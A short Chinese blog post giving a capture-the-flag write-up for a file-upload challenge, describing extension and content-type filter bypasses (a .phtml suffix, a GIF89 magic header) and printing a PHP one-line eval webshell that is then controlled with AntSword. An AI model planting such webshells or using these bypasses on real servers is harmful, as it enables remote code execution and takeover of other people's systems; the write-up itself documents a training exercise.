[极客大挑战 2019]Upload 1

[极客大挑战 2019]Upload 1

打开实例为文件上传页面,代码审计,发现为php文件,采用php马

image-20241105121039232

采用bp抓包修改后缀绕过,上传一句话木马

<?php phpinfo(); @eval($_POST['cmd']); ?>

image-20241105121233920

回显错误,显示不能为php,存在文件类型过滤

image-20241105121321623

尝试采用phtm文件包含php绕过

image-20241105121539643

显示非image文件

image-20241105121706175

尝试采用GIF89幻术头

GIF89

image-20241105122359654

上传成功,但是并未给出回显路径,猜测为/upload/php.phtml

image-20241105122455525

访问地址成功

image-20241105122529041

蚁剑链接,密码cmd

image-20241105122625054

成功在根目录找到flag

image-20241105122728863

image-20241105122737940

posted @ 2024-11-08 18:50  TazmiDev  阅读(203)  评论(0)    收藏  举报